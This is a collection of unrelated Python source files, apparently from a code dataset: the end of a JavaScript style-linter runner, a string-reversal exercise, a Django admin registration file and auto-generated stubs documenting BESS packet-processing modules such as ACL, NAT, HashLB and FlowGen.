return '%.2fs' % duration
def check(self):
"""Check the JavaScript files for style."""
check_path_p = partial(
check_path,
unix_mode=self.args.unix_mode,
limited_doc_files=self.args.limited_doc_files,
error_trace=self.args.error_trace,
closurized_namespaces=self.args.closurized_namespaces,
ignored_extra_namespaces=self.args.ignored_extra_namespaces,
custom_jsdoc_tags=self.args.custom_jsdoc_tags,
dot_on_next_line=self.args.dot_on_next_line,
check_trailing_comma=self.args.check_trailing_comma,
debug_indentation=self.args.debug_indentation,
jslint_error = self.args.jslint_error,
strict = self.args.strict,
jsdoc=self.args.jsdoc,
disable=self.args.disable,
max_line_length=self.args.max_line_length)
if self.args.singleprocess:
records_iter = self._check_paths(check_path_p)
else:
records_iter = self._multiprocess_check_paths(check_path_p)
records_iter, records_iter_copy = tee(records_iter, 2)
self._print_error_records(records_iter_copy)
error_records = list(records_iter)
self._print_summary(self.paths, error_records)
exit_code = 0
# If there are any errors
if error_records:
exit_code += 1
# If there are any new errors
if [r for r in error_records if r.new_error]:
exit_code += 2
if exit_code:
if self.args.summary:
self._print_file_summary(error_records)
if self.args.beep:
# Make a beep noise.
sys.stdout.write(chr(7))
# Write out instructions for using fixjsstyle script to fix some of the
# reported errors.
fix_args = []
for flag in sys.argv[1:]:
for go_flag in GJSLINT_ONLY_FLAGS:
if flag.startswith(go_flag):
break
else:
fix_args.append(flag)
if not self.args.quiet:
print("""
Some of the errors reported by GJsLint may be auto-fixable using the
command fixjsstyle. Please double check any changes it makes and report
any bugs. The command can be run by executing:
fixjsstyle %s """ % ' '.join(fix_args))
if self.args.time:
print ('Done in %s.' % self._format_time(time.time() -
self.start_time))
sys.exit(exit_code)
def fix(self):
"""Fix the code style of the JavaScript files."""
fixer = ErrorFixer(
dry_run=self.args.dry_run,
disable_indentation_fixing=self.args.disable_indentation_fixing,
fix_error_codes=self.args.fix_error_codes)
# Check the list of files.
for path in self.paths:
fix_path(
path,
fixer,
None,
limited_doc_files=self.args.limited_doc_files,
error_trace=self.args.error_trace,
closurized_namespaces=self.args.closurized_namespaces,
ignored_extra_namespaces=self.args.ignored_extra_namespaces,
custom_jsdoc_tags=self.args.custom_jsdoc_tags,
dot_on_next_line=self.args.dot_on_next_line,
check_trailing_comma=self.args.check_trailing_comma,
debug_indentation=self.args.debug_indentation,
jslint_error = self.args.jslint_error,
strict = self.args.strict,
jsdoc=self.args.jsdoc,
disable=self.args.disable,
max_line_length=self.args.max_line_length)
def fix():
"""Automatically fix simple style guide violations."""
style_checker = JsCodeStyle()
style_checker.fix()
def main():
"""Used when called as a command line script."""
style_checker = JsCodeStyle()
style_checker.check()
if __name__ == '__main__':
main()
| 20,820 | 5,817 |
#!/usr/bin/python
# -*- coding:utf-8 -*-
'''
编写一个函数,其作用是将输入的字符串反转过来。
示例 1:
输入: "hello"
输出: "olleh"
示例 2:
输入: "A man, a plan, a canal: Panama"
输出: "amanaP :lanac a ,nalp a ,nam A"
'''
class Solution:
def reverseString(self, s):
'''
:param s: str
:return: str
'''
return s[::-1]
| 326 | 161 |
from django.contrib import admin
from .models import Profile,Neighborhood,Posts,Business
# Register your models here.
admin.site.register(Profile)
admin.site.register(Neighborhood)
admin.site.register(Posts)
admin.site.register(Business)
# admin.site.register(DisLike)
# admin.site.register(MoringaMerch)
# admin.site.register(AwardsProject)
| 343 | 111 |
# This file is auto-genereated by bess-gen-doc.
# See https://github.com/nemethf/bess-gen-doc
#
# It is based on bess/protobuf/module_msg.proto, which has the following copyright.
# Copyright (c) 2016-2017, Nefeli Networks, Inc.
# Copyright (c) 2017, The Regents of the University of California.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the names of the copyright holders nor the names of their
# contributors may be used to endorse or promote products derived from this
# software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from pybess.module import Module
from pybess.bess import BESS
bess = BESS()
class ACL(Module):
"""
ACL module from NetBricks
The module ACL creates an access control module which by default blocks all traffic, unless it contains a rule which specifies otherwise.
Examples of ACL can be found in [acl.bess](https://github.com/NetSys/bess/blob/master/bessctl/conf/samples/acl.bess)
__Input Gates__: 1
__Output Gates__: 1
"""
def __init__(self, rules=None):
"""
The module ACL creates an access control module which by default blocks all traffic, unless it contains a rule which specifies otherwise.
Examples of ACL can be found in [acl.bess](https://github.com/NetSys/bess/blob/master/bessctl/conf/samples/acl.bess)
__Input Gates__: 1
__Output Gates__: 1
:param rules: A list of ACL rules.
"""
pass
def add(self, rules=None):
"""
The module ACL creates an access control module which by default blocks all traffic, unless it contains a rule which specifies otherwise.
Examples of ACL can be found in [acl.bess](https://github.com/NetSys/bess/blob/master/bessctl/conf/samples/acl.bess)
__Input Gates__: 1
__Output Gates__: 1
:param rules: A list of ACL rules.
"""
pass
def clear(self):
pass
class ArpResponder(Module):
"""
Respond to ARP requests and learns new MAC's
The ARP Responder module is responding to ARP requests
TODO: Dynamic learn new MAC's-IP's mapping
__Input Gates__: 1
__Output Gates__: 1
"""
def __init__(self, ip=None, mac_addr=None):
"""
The ARP Responder module is responding to ARP requests
TODO: Dynamic learn new MAC's-IP's mapping
__Input Gates__: 1
__Output Gates__: 1
:param ip: One ARP IP-MAC mapping
The IP
:param mac_addr: The MAC address
"""
pass
def add(self, ip=None, mac_addr=None):
"""
The ARP Responder module is responding to ARP requests
TODO: Dynamic learn new MAC's-IP's mapping
__Input Gates__: 1
__Output Gates__: 1
:param ip: One ARP IP-MAC mapping
The IP
:param mac_addr: The MAC address
"""
pass
class BPF(Module):
"""
classifies packets with pcap-filter(7) syntax
The BPF module is an access control module that sends packets out on a particular gate based on whether they match a BPF filter.
__Input Gates__: 1
__Output Gates__: many (configurable)
"""
def __init__(self, filters=None):
"""
The BPF module is an access control module that sends packets out on a particular gate based on whether they match a BPF filter.
__Input Gates__: 1
__Output Gates__: many (configurable)
:param filters: The BPF initialized function takes a list of BPF filters.
"""
pass
def add(self, filters=None):
"""
The BPF module is an access control module that sends packets out on a particular gate based on whether they match a BPF filter.
__Input Gates__: 1
__Output Gates__: many (configurable)
:param filters: The BPF initialized function takes a list of BPF filters.
"""
pass
def clear(self):
"""
The BPF module has a command `clear()` that takes no parameters.
This command removes all filters from the module.
"""
pass
class Buffer(Module):
"""
buffers packets into larger batches
The Buffer module takes no parameters to initialize (ie, `Buffer()` is sufficient to create one).
Buffer accepts packets and stores them; it may forward them to the next module only after it has
received enough packets to fill an entire PacketBatch.
__Input Gates__: 1
__Output Gates__: 1
"""
def __init__(self):
"""
The Buffer module takes no parameters to initialize (ie, `Buffer()` is sufficient to create one).
Buffer accepts packets and stores them; it may forward them to the next module only after it has
received enough packets to fill an entire PacketBatch.
__Input Gates__: 1
__Output Gates__: 1
"""
pass
class Bypass(Module):
"""
bypasses packets without any processing
The Bypass module forwards packets by emulating pre-defined packet processing overhead.
It burns cpu cycles per_batch, per_packet, and per-bytes.
Bypass is useful primarily for testing and performance evaluation.
__Input Gates__: 1
__Output Gates__: 1
"""
def __init__(self, cycles_per_batch=None, cycles_per_packet=None, cycles_per_byte=None):
"""
The Bypass module forwards packets by emulating pre-defined packet processing overhead.
It burns cpu cycles per_batch, per_packet, and per-bytes.
Bypass is useful primarily for testing and performance evaluation.
__Input Gates__: 1
__Output Gates__: 1
"""
pass
class DRR(Module):
"""
Deficit Round Robin
The Module DRR provides fair scheduling of flows based on a quantum which is
number of bytes allocated to each flow on each round of going through all flows.
Examples can be found [./bessctl/conf/samples/drr.bess]
__Input_Gates__: 1
__Output_Gates__: 1
"""
def __init__(self, num_flows=None, quantum=None, max_flow_queue_size=None):
"""
The Module DRR provides fair scheduling of flows based on a quantum which is
number of bytes allocated to each flow on each round of going through all flows.
Examples can be found [./bessctl/conf/samples/drr.bess]
__Input_Gates__: 1
__Output_Gates__: 1
:param num_flows: Number of flows to handle in module
:param quantum: the number of bytes to allocate to each on every round
:param max_flow_queue_size: the max size that any Flows queue can get
"""
pass
def set_quantum_size(self, quantum=None):
"""
the SetQuantumSize function sets a new quantum for DRR module to operate on.
:param quantum: the number of bytes to allocate to each on every round
"""
pass
def set_max_flow_queue_size(self, max_queue_size=None):
"""
The SetMaxQueueSize function sets a new maximum flow queue size for DRR module.
If the flow's queue gets to this size, the module starts dropping packets to
that flow until the queue is below this size.
:param max_queue_size: the max size that any Flows queue can get
"""
pass
class Dump(Module):
"""
Dump packet data and metadata attributes
The Dump module blindly forwards packets without modifying them. It periodically samples a packet and prints out out to the BESS log (by default stored in `/tmp/bessd.INFO`).
__Input Gates__: 1
__Output Gates__: 1
"""
def __init__(self, interval=None):
"""
The Dump module blindly forwards packets without modifying them. It periodically samples a packet and prints out out to the BESS log (by default stored in `/tmp/bessd.INFO`).
__Input Gates__: 1
__Output Gates__: 1
:param interval: How frequently to sample and print a packet, in seconds.
"""
pass
def set_interval(self, interval=None):
"""
The Dump module blindly forwards packets without modifying them. It periodically samples a packet and prints out out to the BESS log (by default stored in `/tmp/bessd.INFO`).
__Input Gates__: 1
__Output Gates__: 1
:param interval: How frequently to sample and print a packet, in seconds.
"""
pass
class EtherEncap(Module):
"""
encapsulates packets with an Ethernet header
The EtherEncap module wraps packets in an Ethernet header, but it takes no parameters. Instead, Ethernet source, destination, and type are pulled from a packet's metadata attributes.
For example: `SetMetadata('dst_mac', 11:22:33:44:55) -> EtherEncap()`
This is useful when upstream modules wish to assign a MAC address to a packet, e.g., due to an ARP request.
__Input Gates__: 1
__Output Gates__: 1
"""
def __init__(self):
"""
The EtherEncap module wraps packets in an Ethernet header, but it takes no parameters. Instead, Ethernet source, destination, and type are pulled from a packet's metadata attributes.
For example: `SetMetadata('dst_mac', 11:22:33:44:55) -> EtherEncap()`
This is useful when upstream modules wish to assign a MAC address to a packet, e.g., due to an ARP request.
__Input Gates__: 1
__Output Gates__: 1
"""
pass
class ExactMatch(Module):
"""
Multi-field classifier with an exact match table
The ExactMatch module splits packets along output gates according to exact match values in arbitrary packet fields.
To instantiate an ExactMatch module, you must specify which fields in the packet to match over. You can add rules using the function `ExactMatch.add(...)`
Fields may be stored either in the packet data or its metadata attributes.
An example script using the ExactMatch code is found
in [`bess/bessctl/conf/samples/exactmatch.bess`](https://github.com/NetSys/bess/blob/master/bessctl/conf/samples/exactmatch.bess).
__Input Gates__: 1
__Output Gates__: many (configurable)
"""
def __init__(self, fields=None, masks=None):
"""
The ExactMatch module splits packets along output gates according to exact match values in arbitrary packet fields.
To instantiate an ExactMatch module, you must specify which fields in the packet to match over. You can add rules using the function `ExactMatch.add(...)`
Fields may be stored either in the packet data or its metadata attributes.
An example script using the ExactMatch code is found
in [`bess/bessctl/conf/samples/exactmatch.bess`](https://github.com/NetSys/bess/blob/master/bessctl/conf/samples/exactmatch.bess).
__Input Gates__: 1
__Output Gates__: many (configurable)
:param fields: A list of ExactMatch Fields
:param masks: mask(i) corresponds to the mask for field(i)
"""
pass
def get_initial_arg(self):
pass
def get_runtime_config(self):
pass
def set_runtime_config(self, default_gate=None, rules=None):
"""
ExactMatchConfig represents the current runtime configuration
of an ExactMatch module, as returned by get_runtime_config and
set by set_runtime_config.
:return: ExactMatchConfig represents the current runtime configuration
of an ExactMatch module, as returned by get_runtime_config and
set by set_runtime_config.
"""
pass
def add(self, gate=None, fields=None):
"""
The ExactMatch module has a command `add(...)` that takes two parameters.
The ExactMatch initializer specifies what fields in a packet to inspect; add() specifies
which values to check for over these fields.
add() inserts a new rule into the ExactMatch module such that traffic matching
that bytestring will be forwarded
out a specified gate.
Example use: `add(fields=[aton('12.3.4.5'), aton('5.4.3.2')], gate=2)`
:param gate: The gate to forward out packets that mach this rule.
:param fields: The exact match values to check for
"""
pass
def delete(self, fields=None):
"""
The ExactMatch module has a command `delete(...)` which deletes an existing rule.
Example use: `delete(fields=[aton('12.3.4.5'), aton('5.4.3.2')])`
:param fields: The field values for the rule to be deleted.
"""
pass
def clear(self):
"""
The ExactMatch module has a command `clear()` which takes no parameters.
This command removes all rules from the ExactMatch module.
"""
pass
def set_default_gate(self, gate=None):
"""
The ExactMatch module has a command `set_default_gate(...)` which takes one parameter.
This command routes all traffic which does _not_ match a rule to a specified gate.
Example use in bessctl: `setDefaultGate(gate=2)`
:param gate: The gate number to send the default traffic out.
"""
pass
class FlowGen(Module):
"""
generates packets on a flow basis
The FlowGen module generates simulated TCP flows of packets with correct SYN/FIN flags and sequence numbers.
This module is useful for testing, e.g., a NAT module or other flow-aware code.
Packets are generated off a base, "template" packet by modifying the IP src/dst and TCP src/dst. By default, only the ports are changed and will be modified by incrementing the template ports by up to 20000 more than the template values.
__Input Gates__: 0
__Output Gates__: 1
"""
def __init__(self, template=None, pps=None, flow_rate=None, flow_duration=None, arrival=None, duration=None, quick_rampup=None, ip_src_range=None, ip_dst_range=None, port_src_range=None, port_dst_range=None):
"""
The FlowGen module generates simulated TCP flows of packets with correct SYN/FIN flags and sequence numbers.
This module is useful for testing, e.g., a NAT module or other flow-aware code.
Packets are generated off a base, "template" packet by modifying the IP src/dst and TCP src/dst. By default, only the ports are changed and will be modified by incrementing the template ports by up to 20000 more than the template values.
__Input Gates__: 0
__Output Gates__: 1
:param template: The packet "template". All data packets are derived from this template and contain the same payload.
:param pps: The total number of packets per second to generate.
:param flow_rate: The number of new flows to create every second. flow_rate must be <= pps.
:param flow_duration: The lifetime of a flow in seconds.
:param arrival: The packet arrival distribution -- must be either "uniform" or "exponential"
:param duration: The flow duration distribution -- must be either "uniform" or "pareto"
:param quick_rampup: Whether or not to populate the flowgenerator with initial flows (start generating full pps rate immediately) or to wait for new flows to be generated naturally (all flows have a SYN packet).
:param ip_src_range: When generating new flows, FlowGen modifies the template packet by changing the IP src, incrementing it by at most ip_src_range (e.g., if the base packet is 10.0.0.1 and range is 5, it will generate packets with IPs 10.0.0.1-10.0.0.6).
:param ip_dst_range: When generating new flows, FlowGen modifies the template packet by changing the IP dst, incrementing it by at most ip_dst_range.
:param port_src_range: When generating new flows, FlowGen modifies the template packet by changing the TCP port, incrementing it by at most port_src_range.
:param port_dst_range: When generating new flows, FlowGen modifies the template packet by changing the TCP dst port, incrementing it by at most port_dst_range.
"""
pass
def update(self, template=None, pps=None, flow_rate=None, flow_duration=None, arrival=None, duration=None, quick_rampup=None, ip_src_range=None, ip_dst_range=None, port_src_range=None, port_dst_range=None):
"""
The FlowGen module generates simulated TCP flows of packets with correct SYN/FIN flags and sequence numbers.
This module is useful for testing, e.g., a NAT module or other flow-aware code.
Packets are generated off a base, "template" packet by modifying the IP src/dst and TCP src/dst. By default, only the ports are changed and will be modified by incrementing the template ports by up to 20000 more than the template values.
__Input Gates__: 0
__Output Gates__: 1
:param template: The packet "template". All data packets are derived from this template and contain the same payload.
:param pps: The total number of packets per second to generate.
:param flow_rate: The number of new flows to create every second. flow_rate must be <= pps.
:param flow_duration: The lifetime of a flow in seconds.
:param arrival: The packet arrival distribution -- must be either "uniform" or "exponential"
:param duration: The flow duration distribution -- must be either "uniform" or "pareto"
:param quick_rampup: Whether or not to populate the flowgenerator with initial flows (start generating full pps rate immediately) or to wait for new flows to be generated naturally (all flows have a SYN packet).
:param ip_src_range: When generating new flows, FlowGen modifies the template packet by changing the IP src, incrementing it by at most ip_src_range (e.g., if the base packet is 10.0.0.1 and range is 5, it will generate packets with IPs 10.0.0.1-10.0.0.6).
:param ip_dst_range: When generating new flows, FlowGen modifies the template packet by changing the IP dst, incrementing it by at most ip_dst_range.
:param port_src_range: When generating new flows, FlowGen modifies the template packet by changing the TCP port, incrementing it by at most port_src_range.
:param port_dst_range: When generating new flows, FlowGen modifies the template packet by changing the TCP dst port, incrementing it by at most port_dst_range.
"""
pass
def set_burst(self, burst=None):
"""
The FlowGen module has a command `set_burst(...)` that allows you to specify
the maximum number of packets to be stored in a single PacketBatch released
by the module.
"""
pass
class GenericDecap(Module):
"""
remove specified bytes from the beginning of packets
The GenericDecap module strips off the first few bytes of data from a packet.
__Input Gates__: 1
__Ouptut Gates__: 1
"""
def __init__(self, bytes=None):
"""
The GenericDecap module strips off the first few bytes of data from a packet.
__Input Gates__: 1
__Ouptut Gates__: 1
:param bytes: The number of bytes to strip off.
"""
pass
class GenericEncap(Module):
"""
encapsulates packets with constant values and metadata attributes
The GenericEncap module adds a header to packets passing through it.
Takes a list of fields. Each field is either:
1. {'size': X, 'value': Y} (for constant values)
2. {'size': X, 'attribute': Y} (for metadata attributes)
e.g.: `GenericEncap([{'size': 4, 'value': 0xdeadbeef},
{'size': 2, 'attribute': 'foo'},
{'size': 2, 'value': 0x1234}])`
will prepend a 8-byte header:
`de ad be ef <xx> <xx> 12 34`
where the 2-byte `<xx> <xx>` comes from the value of metadata attribute `'foo'`
for each packet.
An example script using GenericEncap is in [`bess/bessctl/conf/samples/generic_encap.bess`](https://github.com/NetSys/bess/blob/master/bessctl/conf/samples/generic_encap.bess).
__Input Gates__: 1
__Output Gates__: 1
"""
def __init__(self, fields=None):
"""
The GenericEncap module adds a header to packets passing through it.
Takes a list of fields. Each field is either:
1. {'size': X, 'value': Y} (for constant values)
2. {'size': X, 'attribute': Y} (for metadata attributes)
e.g.: `GenericEncap([{'size': 4, 'value': 0xdeadbeef},
{'size': 2, 'attribute': 'foo'},
{'size': 2, 'value': 0x1234}])`
will prepend a 8-byte header:
`de ad be ef <xx> <xx> 12 34`
where the 2-byte `<xx> <xx>` comes from the value of metadata attribute `'foo'`
for each packet.
An example script using GenericEncap is in [`bess/bessctl/conf/samples/generic_encap.bess`](https://github.com/NetSys/bess/blob/master/bessctl/conf/samples/generic_encap.bess).
__Input Gates__: 1
__Output Gates__: 1
"""
pass
class HashLB(Module):
"""
splits packets on a flow basis with L2/L3/L4 header fields
The HashLB module partitions packets between output gates according to either
a hash over their MAC src/dst (`mode='l2'`), their IP src/dst (`mode='l3'`), the full
IP/TCP 5-tuple (`mode='l4'`), or the N-tuple defined by `fields`.
__Input Gates__: 1
__Output Gates__: many (configurable)
"""
def __init__(self, gates=None, mode=None, fields=None):
"""
The HashLB module partitions packets between output gates according to either
a hash over their MAC src/dst (`mode='l2'`), their IP src/dst (`mode='l3'`), the full
IP/TCP 5-tuple (`mode='l4'`), or the N-tuple defined by `fields`.
__Input Gates__: 1
__Output Gates__: many (configurable)
:param gates: A list of gate numbers over which to partition packets
:param mode: The mode (`'l2'`, `'l3'`, or `'l4'`) for the hash function.
:param fields: A list of fields that define a custom tuple.
"""
pass
def set_mode(self, mode=None, fields=None):
"""
The HashLB module has a command `set_mode(...)` which takes two parameters.
The `mode` parameter specifies whether the load balancer will hash over the
src/dest ethernet header (`'l2'`), over the src/dest IP addresses (`'l3'`), or over
the flow 5-tuple (`'l4'`). Alternatively, if the `fields` parameter is set, the
load balancer will hash over the N-tuple with the specified offsets and
sizes.
Example use in bessctl: `lb.set_mode('l2')`
:param mode: What fields to hash over, `'l2'`, `'l3'`, and `'l4'` are only valid values.
:param fields: A list of fields that define a custom tuple.
"""
pass
def set_gates(self, gates=None):
"""
The HashLB module has a command `set_gates(...)` which takes one parameter.
This function takes in a list of gate numbers to send hashed traffic out over.
Example use in bessctl: `lb.setGates(gates=[0,1,2,3])`
:param gates: A list of gate numbers to load balance traffic over
"""
pass
class IPChecksum(Module):
"""
recomputes the IPv4 checksum
"""
class IPEncap(Module):
"""
encapsulates packets with an IPv4 header
Encapsulates a packet with an IP header, where IP src, dst, and proto are filled in
by metadata values carried with the packet. Metadata attributes must include:
ip_src, ip_dst, ip_proto, ip_nexthop, and ether_type.
__Input Gates__: 1
__Output Gates__: 1
"""
def __init__(self):
"""
Encapsulates a packet with an IP header, where IP src, dst, and proto are filled in
by metadata values carried with the packet. Metadata attributes must include:
ip_src, ip_dst, ip_proto, ip_nexthop, and ether_type.
__Input Gates__: 1
__Output Gates__: 1
"""
pass
class IPLookup(Module):
"""
performs Longest Prefix Match on IPv4 packets
An IPLookup module perfroms LPM lookups over a packet destination.
IPLookup takes no parameters to instantiate.
To add rules to the IPLookup table, use `IPLookup.add()`
__Input Gates__: 1
__Output Gates__: many (configurable, depending on rule values)
"""
def __init__(self, max_rules=None, max_tbl8s=None):
"""
An IPLookup module perfroms LPM lookups over a packet destination.
IPLookup takes no parameters to instantiate.
To add rules to the IPLookup table, use `IPLookup.add()`
__Input Gates__: 1
__Output Gates__: many (configurable, depending on rule values)
:param max_rules: Maximum number of rules (default: 1024)
:param max_tbl8s: Maximum number of IP prefixes with smaller than /24 (default: 128)
"""
pass
def add(self, prefix=None, prefix_len=None, gate=None):
"""
The IPLookup module has a command `add(...)` which takes three paramters.
This function accepts the routing rules -- CIDR prefix, CIDR prefix length,
and what gate to forward matching traffic out on.
Example use in bessctl: `table.add(prefix='10.0.0.0', prefix_len=8, gate=2)`
:param prefix: The CIDR IP part of the prefix to match
:param prefix_len: The prefix length
:param gate: The number of the gate to forward matching traffic on.
"""
pass
def delete(self, prefix=None, prefix_len=None):
"""
The IPLookup module has a command `delete(...)` which takes two paramters.
This function accepts the routing rules -- CIDR prefix, CIDR prefix length,
Example use in bessctl: `table.delete(prefix='10.0.0.0', prefix_len=8)`
:param prefix: The CIDR IP part of the prefix to match
:param prefix_len: The prefix length
"""
pass
def clear(self):
"""
The IPLookup module has a command `clear()` which takes no parameters.
This function removes all rules in the IPLookup table.
Example use in bessctl: `myiplookuptable.clear()`
"""
pass
class IPSwap(Module):
"""
swaps source/destination IP addresses and L4 ports
"""
class L2Forward(Module):
"""
classifies packets with destination MAC address
An L2Forward module forwards packets to an output gate according to exact-match rules over
an Ethernet destination.
Note that this is _not_ a learning switch -- forwards according to fixed
routes specified by `add(..)`.
__Input Gates__: 1
__Ouput Gates__: many (configurable, depending on rules)
"""
def __init__(self, size=None, bucket=None):
"""
An L2Forward module forwards packets to an output gate according to exact-match rules over
an Ethernet destination.
Note that this is _not_ a learning switch -- forwards according to fixed
routes specified by `add(..)`.
__Input Gates__: 1
__Ouput Gates__: many (configurable, depending on rules)
:param size: Configures the forwarding hash table -- total number of hash table entries.
:param bucket: Configures the forwarding hash table -- total number of slots per hash value.
"""
pass
def add(self, entries=None):
"""
The L2Forward module forwards traffic via exact match over the Ethernet
destination address. The command `add(...)` allows you to specifiy a
MAC address and which gate the L2Forward module should direct it out of.
:param entries: A list of L2Forward entries.
"""
pass
def delete(self, addrs=None):
"""
The L2Forward module has a function `delete(...)` to remove a rule
from the MAC forwarding table.
:param addrs: The address to remove from the forwarding table
"""
pass
def set_default_gate(self, gate=None):
"""
For traffic reaching the L2Forward module which does not match a MAC rule,
the function `set_default_gate(...)` allows you to specify a default gate
to direct unmatched traffic to.
:param gate: The default gate to forward traffic which matches no entry to.
"""
pass
def lookup(self, addrs=None):
"""
The L2Forward module has a function `lookup(...)` to query what output gate
a given MAC address will be forwared to; it returns the gate ID number.
:param addrs: The MAC address to query for
:return: This message type provides the reponse to the L2Forward function `lookup(..)`.
It returns the gate that a requested MAC address is currently assigned to.
"""
pass
def populate(self, base=None, count=None, gate_count=None):
"""
The L2Forward module has a command `populate(...)` which allows for fast creation
of the forwarding table given a range of MAC addresses. The function takes in a
'base' MAC address, a count (number of MAC addresses), and a gate_id. The module
will route all MAC addresses starting from the base address, up to base+count address
round-robin over gate_count total gates.
For example, `populate(base='11:22:33:44:00', count = 10, gate_count = 2) would
route addresses 11:22:33:44::(00, 02, 04, 06, 08) out a gate 0 and the odd-suffixed
addresses out gate 1.
:param base: The base MAC address
:param count: How many addresses beyond base to populate into the routing table
:param gate_count: How many gates to create in the L2Forward module.
"""
pass
class L4Checksum(Module):
"""
recomputes the TCP/Ipv4 and UDP/IPv4 checksum
"""
class MACSwap(Module):
"""
swaps source/destination MAC addresses
The MACSwap module takes no arguments. It swaps the src/destination MAC addresses
within a packet.
__Input Gates__: 1
__Output Gates__: 1
"""
def __init__(self):
"""
The MACSwap module takes no arguments. It swaps the src/destination MAC addresses
within a packet.
__Input Gates__: 1
__Output Gates__: 1
"""
pass
class MPLSPop(Module):
"""
Pop MPLS label
The MPLS pop module removes MPLS labels
__Input Gates__: 1
__Output Gates__: 2
"""
def __init__(self, remove_eth_header=None, next_eth_type=None):
"""
The MPLS pop module removes MPLS labels
__Input Gates__: 1
__Output Gates__: 2
:param remove_eth_header: Remove ETH header with the pop
:param next_eth_type: The next ETH type to set
"""
pass
def set(self, remove_eth_header=None, next_eth_type=None):
"""
The MPLS pop module removes MPLS labels
__Input Gates__: 1
__Output Gates__: 2
:param remove_eth_header: Remove ETH header with the pop
:param next_eth_type: The next ETH type to set
"""
pass
class Measure(Module):
"""
measures packet latency (paired with Timestamp module)
The measure module tracks latencies, packets per second, and other statistics.
It should be paired with a Timestamp module, which attaches a timestamp to packets.
The measure module will log how long (in nanoseconds) it has been for each packet it received since it was timestamped.
This module is somewhat experimental and undergoing various changes.
There is a test for the the Measure module in [`bessctl/module_tests/timestamp.py`](https://github.com/NetSys/bess/blob/master/bessctl/module_tests/timestamp.py).
__Input Gates__: 1
__Output Gates__: 1
"""
def __init__(self, offset=None, jitter_sample_prob=None, latency_ns_max=None, latency_ns_resolution=None):
"""
The measure module tracks latencies, packets per second, and other statistics.
It should be paired with a Timestamp module, which attaches a timestamp to packets.
The measure module will log how long (in nanoseconds) it has been for each packet it received since it was timestamped.
This module is somewhat experimental and undergoing various changes.
There is a test for the the Measure module in [`bessctl/module_tests/timestamp.py`](https://github.com/NetSys/bess/blob/master/bessctl/module_tests/timestamp.py).
__Input Gates__: 1
__Output Gates__: 1
:param offset: int64 warmup = 1; /// removed: instead of warmup delay, user should Clear()
/ Where to store the current time within the packet, offset in bytes.
:param jitter_sample_prob: How often the module should sample packets for inter-packet arrival measurements (to measure jitter).
:param latency_ns_max: maximum latency expected, in ns (default 0.1 s)
:param latency_ns_resolution: resolution, in ns (default 100)
"""
pass
def get_summary(self, clear=None, latency_percentiles=None, jitter_percentiles=None):
"""
The Measure module measures and collects latency/jitter data for packets
annotated by a Timestamp module. Note that Timestamp and Measure module must reside
on the server for accurate measurement (as a result, the most typical use case is
measuring roundtrip time).
Optionally, you can also retrieve percentile values by specifying points in
"percentiles". For example, "percentiles" of [50.0, 99.0] will return
[median, 99'th %-ile tail latency] in "percentile_values_ns" in the response.
:param clear: if true, the data will be all cleared after read
:param latency_percentiles: ascending list of real numbers in [0.0, 100.0]
:param jitter_percentiles: ascending list of real numbers in [0.0, 100.0]
:return: The Measure module function `get_summary()` returns the following values.
Note that the resolution value tells you how grainy the samples are,
e.g., 100 means that anything from 0-99 ns counts as "0",
anything from 100-199 counts as "100", and so on. The average
is of samples using this graininess, but (being a result of division)
may not be a multiple of the resolution.
"""
pass
def clear(self):
pass
class Merge(Module):
"""
All input gates go out of a single output gate
The merge module takes no parameters. It has multiple input gates,
and passes out all packets from a single output gate.
__Input Gates__: many (configurable)
__Output Gates__: 1
"""
def __init__(self):
"""
The merge module takes no parameters. It has multiple input gates,
and passes out all packets from a single output gate.
__Input Gates__: many (configurable)
__Output Gates__: 1
"""
pass
class MetadataTest(Module):
"""
Dynamic metadata test module
The MetadataTest module is used for internal testing purposes.
"""
def __init__(self, read=None, write=None, update=None):
"""
The MetadataTest module is used for internal testing purposes.
"""
pass
class NAT(Module):
"""
Dynamic Network address/port translator
The NAT module implements Dynamic IPv4 address/port translation,
rewriting packet source addresses with external addresses as specified,
and destination addresses for packets on the reverse direction.
L3/L4 checksums are updated correspondingly.
To see an example of NAT in use, see:
[`bess/bessctl/conf/samples/nat.bess`](https://github.com/NetSys/bess/blob/master/bessctl/conf/samples/nat.bess)
Currently only supports TCP/UDP/ICMP.
Note that address/port in packet payload (e.g., FTP) are NOT translated.
__Input Gates__: 2 (0 for internal->external, and 1 for external->internal direction)
__Output Gates__: 2 (same as the input gate)
"""
def __init__(self, ext_addrs=None):
"""
The NAT module implements Dynamic IPv4 address/port translation,
rewriting packet source addresses with external addresses as specified,
and destination addresses for packets on the reverse direction.
L3/L4 checksums are updated correspondingly.
To see an example of NAT in use, see:
[`bess/bessctl/conf/samples/nat.bess`](https://github.com/NetSys/bess/blob/master/bessctl/conf/samples/nat.bess)
Currently only supports TCP/UDP/ICMP.
Note that address/port in packet payload (e.g., FTP) are NOT translated.
__Input Gates__: 2 (0 for internal->external, and 1 for external->internal direction)
__Output Gates__: 2 (same as the input gate)
:param ext_addrs: list of external IP addresses
"""
pass
def get_initial_arg(self):
pass
def get_runtime_config(self):
pass
def set_runtime_config(self):
pass
class NoOP(Module):
"""
creates a task that does nothing
This module is used for testing purposes.
"""
def __init__(self):
"""
This module is used for testing purposes.
